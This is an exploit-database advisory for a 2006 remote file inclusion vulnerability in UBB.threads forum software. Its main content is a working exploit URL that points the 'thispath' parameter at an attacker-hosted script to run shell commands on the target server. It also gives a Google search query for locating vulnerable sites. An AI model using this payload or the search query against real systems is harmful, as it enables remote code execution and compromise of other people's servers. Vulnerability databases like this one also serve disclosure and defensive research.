UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability

# Title: UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
# EDB-ID: 1814
# CVE-ID: (2006-2568)
# OSVDB-ID: (25714)
# Author: V4mu
# Published: 2006-05-22
# Verified: yes
# Download Exploit Code
# Download N/A

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]